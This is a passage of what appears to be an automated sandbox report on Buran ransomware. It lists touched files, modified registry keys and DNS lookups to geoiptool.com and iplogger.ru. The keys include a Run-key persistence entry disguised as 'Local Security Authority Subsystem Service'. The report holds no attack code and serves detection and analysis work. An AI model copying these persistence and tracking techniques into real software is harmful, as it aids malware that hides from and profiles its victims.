1493 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentfallback.xml",
1494 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentlogon.xml",
1495 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnms006.inf",
1496 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15.cat",
1497 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.cat",
1498 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.inf",
1499 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-manifest.ini",
1500 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-PipelineConfig.xml",
1501 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.gpd",
1502 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.ini",
1503 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNoteNames.gpd",
1504 "C:\\Program Files\\Notepad++\\contextMenu.xml",
1505 "C:\\Program Files\\Notepad++\\functionList.xml",
1506 "C:\\Program Files\\Notepad++\\langs.model.xml",
1507 "C:\\Program Files\\Notepad++\\LICENSE"
1508
1509
1510* Modified Registry Keys:
1511 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service",
1512 "HKEY_CURRENT_USER\\Software\\Buran V\\Service",
1513 "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Public Key",
1514 "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Machine ID",
1515 "HKEY_CURRENT_USER\\Software\\Buran V\\Knock",
1516 "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Paths",
1517 "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Paths\\0",
1518 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
1519 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\DA0ED248-9EDB-4144-B9E7-AFC1D00A662A",
1520 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\B17E070E-57E3-43F6-96F5-A9A9C921DEBF\\DynamicInfo",
1521 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\A14B62F8-6D27-44D8-BFCB-66F44117F2A4",
1522 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\DF000DCA-3FA2-48A6-9E59-C0606F9F8D73\\DynamicInfo",
1523 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\4C64B42C-C15C-4AFB-9A31-7317BC95FE05",
1524 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\F7093373-6201-40B8-8D09-6E7E59E028EB",
1525 "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\Registry Writer",
1526 "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\COM+ REGDB Writer",
1527 "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\ASR Writer",
1528 "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\Shadow Copy Optimization Writer",
1529 "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers",
1530 "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\\(Default)",
1531 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\DA0ED248-9EDB-4144-B9E7-AFC1D00A662A\\data",
1532 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\A14B62F8-6D27-44D8-BFCB-66F44117F2A4\\data",
1533 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\4C64B42C-C15C-4AFB-9A31-7317BC95FE05\\data",
1534 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\F7093373-6201-40B8-8D09-6E7E59E028EB\\data"
1535
1536
1537* Deleted Registry Keys:
1538
1539* DNS Communications:
1540
1541 "type": "A",
1542 "request": "geoiptool.com",
1543 "answers":
1544
1545
1546 "type": "A",
1547 "request": "iplogger.ru",
1548 "answers":
1549
1550
1551
1552* Domains:
1553
1554 "ip": "158.69.67.193",
1555 "domain": "geoiptool.com"
1556
1557
1558 "ip": "88.99.66.31",
1559 "domain": "iplogger.ru"
1560
1561
1562
1563* Network Communication - ICMP:
1564
1565* Network Communication - HTTP:
1566
1567* Network Communication - SMTP:
1568
1569* Network Communication - Hosts:
1570
1571* Network Communication - IRC: